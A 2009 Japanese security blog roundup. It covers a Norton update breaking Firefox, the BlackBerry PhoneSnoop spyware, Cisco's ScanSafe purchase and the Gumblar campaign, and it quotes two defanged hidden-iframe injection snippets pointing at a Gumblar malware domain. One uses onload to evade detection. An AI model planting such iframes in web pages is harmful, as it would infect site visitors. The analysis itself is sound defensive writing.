« アップデート各種
2009.10.30 金曜日 »

2009.10.29 木曜日

ホームビデオ記念日(ビデオ戦争)
おしぼりの日 (全国おしぼり協同組合連合会)
とらふぐの日

----------
don't update firefox (with Norton)

またやらかしてくれたようで・・
NIS2010のアップデートでアドオンが使用できなくなる問題が発生 -- Mozilla Flux
アドオンマネージャから個別のアドオンの設定画面を呼び出そうとすると処理が停止してしまうほか、アドオンを更新しても、再起動を促すメッセージは表示されるものの、通知バーが出ないのが特徴だ。とくに前者は、Firefox本体を終了してもウィンドウが残ってしまい、タスクマネージャでプロセスを消すことを余儀なくされる。不便なことおびただしい。

会社のPCに入れる前に気がついてよかった・・・
かといって脆弱性の残っていることが判っているバージョンを使い続けるわけにもいかず・・・セキュソフトの都合で脆弱性バージョンを使うってセキュソフトの存在意義が問われそうですね(苦笑)

Re: Norton Toolbar disappears after applying 17.1.0.14 patch
We don't have a firm ETA on the fix right now.
NO ETA™
あと、こんなのも起きてる様子・・・
Unable to launch Microsoft Outlook after applying 17.1.0.14 patch
but I cannot get Outlook to open at all. I get a message "Cannot start Microsoft Outlook. Cannot open the Outlook window." I do a lot of my small business work by e-mail, so this is fairly serious.

会社のNorton信奉もそろそろ何とかしたい・・・

----------
BlackBerryからの会話はすべて聞かせてもらった!

ガラッ!って効果音が必要だったかな?
BlackBerry PhoneSnoop Application Used to Spy on Users
US-CERT is aware of public reports of a new software application called PhoneSnoop. This software allows an attacker to call a user's BlackBerry and listen to personal conversations. In order to install and setup the PhoneSnoop application, attackers must have physical access to the user's device or convince a user to install PhoneSnoop.

US-CERT warns about BlackBerry spyware app
PhoneSnoop – Turn a BlackBerry into a portable bug

BlackBerryの盗聴アプリ「PhoneSnoop」に要注意
RIM、BlackBerryの盗聴アプリに見解
RIMが調査したところ、PhoneSnoopは特定の電話番号からの着信で起動し、端末を盗聴デバイスに変えてしまうことが分かった。盗聴できるのは端末での通話内容ではなく、端末の周囲の音声であるといい、端末にセキュリティホールが存在するわけではないと説明している。
実際に盗聴するには、US-CERTが解説しているように標的となるユーザーの端末へPhoneSnoopを直接インストールする必要があり、攻撃手法の難易度は極めて高いという。

とりあえずは、端末の物理的操作が必要なようですが、BlackBerryユーザは自分の端末(あるいは会社の支給品)にどんなアプリがインストールされているか把握する必要があるということでしょう。
※上司が盗聴してるかも?とか考えるとちょっと怖い・笑

----------
Cisco to Acquire ScanSafe

Cisco Announces Intent to Acquire ScanSafe
SAN JOSE, Calif. – Oct. 27, 2009 – Cisco today announced its intent to acquire privately held ScanSafe, Inc.
お~
これは予想していなかった買収です。
Gumblarなどの解析結果は今後はCiscoから出されるのかな?(笑)

ともあれ、「おめでとうございます」。ということにしておきましょう。
Cisco、Webセキュリティ企業のScanSafeを1億8300万ドルで買収

----------
Gumblar calm down

Adobe Reader / Acrobatを狙う攻撃が減少【Tokyo SOC Report】
現在のところ鎮静化傾向にありますが、改ざんされたままのWebサイトもあるので、依然として注意が必要です。クライアントPCでご利用のアプリケーションを最新のバージョンへアップデートすることをご検討ください。

穿った見方をすれば、「目的は達したので戦略的撤退」を果たしただけかもしれません。何しろ5月末から今までずっと潜伏し、網を張っていた組織ですので・・・
この手の犯罪に憶測は禁物ですが。

被害とその実態および回復
新種の「Gumblar」PHPウイルスがはやっています
【警告】新種の「Gumblar」PHPウイルスの猛威 そのメカニズム
「やられ群」1・2・3の組み合わせがねずみ講を連想してしまうのは私だけ?(笑)
想像ですが、やられ群1と2に関しては、旧Gumblarによって盗まれたFTP Credential(s)の中から無作為に抽出したものではないか?と考えています。特に1群にはバーチャルホストに収容されているレンタルサーバを狙っている節があり、対策が難しい点を悪用しているような気がします。(ISPが実稼動機を停止できないため、ISPが各個にユーザへの感染確認などを行うハメになってしまい、結果的に時間稼ぎをされてしまう)

----------
iFrameインジェクションの進化

Evolution of Hidden Iframes

iframeを隠す手段としてよく使われているのが
<iframe src="hxxp://gumblar .cn/ count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
のように visible 属性を none にしたり、 style属性を hidden にしたりする手法です。あるいは、<div style="display:none">のように、直前のdivブロックを非表示にすることもよく目にします。

今回新しく発見された手法は
<iframe frameborder="0" onload="if (!this.src){ this.src='hxxp://gumblar .cn/ index.php'; this.height='0'; this.width='0';}" >dvexgqoexlsvajdiodgqvxswnifzmxo</iframe>
onloadを使って、検出パターンから逃れようとしています。
インジェクション onload属性の利用

----------
DAY -27- Active Directory Ports

137 138 139 および 445 を外部に出し・外部から応答にしている方はさすがに減ったのではないか?とは思っていますが・・・・
Cyber Security Awareness Month - Day 27 - Active Directory Ports
他にも沢山使っています。

こうした Windowsサービスで使用されているポートのトラフィックは VPNを使っているのであればそのトンネルのみを許可、それ以外であれば基本的にはルータ・ファイアウォールでブロックしておいたほうが無難でしょう。
第4回 ネットワーク・セキュリティを実現する「Windowsファイアウォール」 -- 2005.06
もっとも、VPNを経由したADは、細切れになったファイルの転送が激しく遅いという NetBIOSの特徴で、使い物にならないほど速度が低下することがありますが・・・

----------
DAY -28- NTP 123UDP

Cyber Security Awareness Month - Day 28 - ntp (123/udp)

ケルベロス認証は使ってませんが、同期がときどき日単位で狂うことはありますね(苦笑)たぶん、何かの設定がおかしいのでしょうけど、放置していたら怒られそうなので同期頻度を上げたことはあります。

あと time_t()の2036/2038年問題なんかもあったような・・

----------
時間切れ

Google Safe Browsing STATUS:
サーバ堕ちてる(泣)

本日帰社予定~
EoF

This entry was posted on 木曜日, 10 月 29th, 2009 at 9:32 AM and is filed under security. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

2 Responses to “2009.10.29 木曜日”

  1. うまやど Says:
    10 月 29th, 2009 at 11:46 PM

    引用ありがとうございます。

    任意のphpコードを実行可能なコードが埋め込まれているので、
    まだまだ、拡大はつづくような気がします。
    いまでも、ほったらかしのサイトも多いようですし。

    「やられ1群」は、「やられ2群」にいろいろなコードを
    与えて、徐々に「やられ1群」に進化させるのかもしれません。
    手元の1台には、報告の多い「やられ2群」以外のファイルが
    複数存在していました。


  2. gnome Says:
    10 月 30th, 2009 at 2:58 PM

    うまやど様、コメントありがとうございます。

    前回のGumblarであまりにも急激に拡大しすぎて、収拾がつかなくなってしまったのではないか?というアナリストレポートもありましたので、今回は慎重に潜伏する道をとっているのかもしれません。
    XPの起動不能は、おそらく注入ミスでしょうが、逆に言えばそれだけ「感染後放置」されていたBot端末(Zombie)が多いことを示しています。

    いずれにせよ、こんごもじわじわと被害が拡大するのでしょうね・・


Leave a Reply

*
画像に書かれた文字を入力してください

スパム対策用画像
ログインすると画像認証なしで投稿できます

ホットワード 木曜日 padding margin アップデート 金曜日